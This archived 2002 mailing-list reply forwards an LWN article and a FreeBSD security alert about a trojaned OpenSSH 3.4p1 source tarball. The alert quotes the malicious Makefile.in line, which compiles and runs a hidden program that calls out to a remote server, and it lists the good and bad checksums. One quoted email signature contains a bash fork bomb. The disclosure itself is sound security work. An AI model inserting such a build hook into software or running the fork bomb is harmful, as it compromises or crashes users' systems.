[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Savannah-hackers] Re: OpenSSH 3.4p1 trojaned
From: |
Jeff Bailey |
Subject: |
[Savannah-hackers] Re: OpenSSH 3.4p1 trojaned |
Date: |
Thu, 1 Aug 2002 11:57:58 -0700 |
User-agent: |
Mutt/1.3.28i |
the Debian package isn't affected, either source or binary.
On Thu, Aug 01, 2002 at 02:55:41PM -0400, Mark H. Weaver wrote:
> http://lwn.net/Articles/6524/
>
> [...]
>
> Trojan horse in OpenSSH 3.4p1 source distribution
>
> From: Mikael Olsson <address@hidden>
> To: address@hidden
> Subject: openssh-3.4p1.tar.gz distribution recently trojaned
> Date: Thu, 01 Aug 2002 13:20:47 +0200
>
>
> From
> [27]http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-secur
> ity
>
> ----- Forwarded message from Edwin Groothuis <address@hidden> -----
>
> Date: Thu, 1 Aug 2002 16:55:51 +1000
> From: Edwin Groothuis <address@hidden>
> To: address@hidden
> Subject: openssh-3.4p1.tar.gz trojaned
>
> Greetings,
>
> Just want to inform you that the OpenSSH package op ftp.openbsd.org
> (and probably all its mirrors now) it trojaned:
>
>
> [28]ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz
>
> The OpenBSD people have been informed about it (via email to
> address@hidden and via irc.openprojects.org/#openbsd)
>
>
> The changed files are openssh-3.4p1/openbsd-compat/Makefile.in:
> all: libopenbsd-compat.a
> + @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh
> ./bf-test.out &
>
> bf-test.c[1] is nothing more than a wrapper which generates a
> shell-script[2] which compiles itself and tries to connect to an
> server running on 203.62.158.32:6667 (web.snsonline.net).
>
> [1] [29]http://www.mavetju.org/~edwin/bf-test.c
> [2] [30]http://www.mavetju.org/~edwin/bf-output.sh
>
> This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD
> ports system:
> MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8
>
> This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:
> MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
>
> Edwin
>
> --
> Edwin Groothuis | Personal website: [31]http://www.MavEtJu.org
> address@hidden | Weblog: [32]http://www.mavetju.org/weblog/weblog.php
> bash$ :(){ :|:&};: | Interested in MUDs? [33]http://www.FatalDimensions.org/
> __________________________________________
>
> ([34]Log in to post comments)
>
> Trojan horse in OpenSSH 3.4p1 source distribution
> (Posted Aug 01, 2002 15:07 UTC (Thu) by craighagan) ([35]Post reply)
>
> This appears to be a FreeBSD ports thing. I build from
> sources downloaded from the openssh website within 24 hours
> of the release. I've double-checked said sources and
> do *not* see either the Makefile.in modification
> nor the bf-test.c source via find.
>
> I recommend other folks check their sources so that
> either the ports origin -- or a hack at openssh's distribution
> point can be confirmed.
>
> Trojan horse in OpenSSH 3.4p1 source distribution
> (Posted Aug 01, 2002 15:08 UTC (Thu) by craighagan) ([36]Post reply)
>
> silly me. i forgot that -ports ftp's the software upon build.
>
> Trojan horse in OpenSSH 3.4p1 source distribution
> (Posted Aug 01, 2002 16:22 UTC (Thu) by erat) ([37]Post reply)
>
> I built 3.4p1 last night from a tarball downloaded from openssh.com.
> No trojan found, and the checksum matched the "good" checksum from the
> security alert.
>
> Copyright ()) 2002, Eklektix, Inc.
> Linux (.) is a registered trademark of Linus Torvalds
> Web hosting provided by [38]Rackspace.com.
>
> References
>
> 1. http://lwn.net/
> 2. http://php.lwn.net/corp/advertise/text/visit.php3?adid=382
> 3. http://php.lwn.net/mediakit/index.php3?s=t
> 4. http://lwn.net/login
> 5. http://lwn.net/newaccount
> 6. http://lwn.net/Articles/5712/
> 7. http://lwn.net/Articles/5052/
> 8. http://lwn.net/Articles/4553/
> 9. http://lwn.net/Articles/4151/
> 10. http://lwn.net/Articles/3668/
> 11. http://lwn.net/Articles/6524/?format=printable
> 12. http://lwn.net/
> 13. http://lwn.net/current/
> 14. http://lwn.net/Archives/
> 15. http://lwn.net/security
> 16. http://www.linuxcalendar.com/
> 17. http://old.lwn.net/Distributions/
> 18. http://old.lwn.net/Gallery/
> 19. http://lwn.net/KernelPatches/
> 20. http://old.lwn.net/stocks
> 21. http://old.lwn.net/
> 22. http://lwn.net/op/About.lwn/
> 23. http://php.lwn.net/corp/donate/
> 24. http://lwn.net/mediakit
> 25. http://lwn.net/headlines/
> 26. http://lwn.net/op/Privacy.lwn/
> 27.
> http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-security
> 28. ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz
> 29. http://www.mavetju.org/~edwin/bf-test.c
> 30. http://www.mavetju.org/~edwin/bf-output.sh
> 31. http://www.MavEtJu.org/
> 32. http://www.mavetju.org/weblog/weblog.php
> 33. http://www.FatalDimensions.org/
> 34. http://lwn.net/login
> 35. http://lwn.net/Articles/6547/comment
> 36. http://lwn.net/Articles/6550/comment
> 37. http://lwn.net/Articles/6560/comment
> 38. http://www.rackspace.com/
>
--
I reincarnated for this?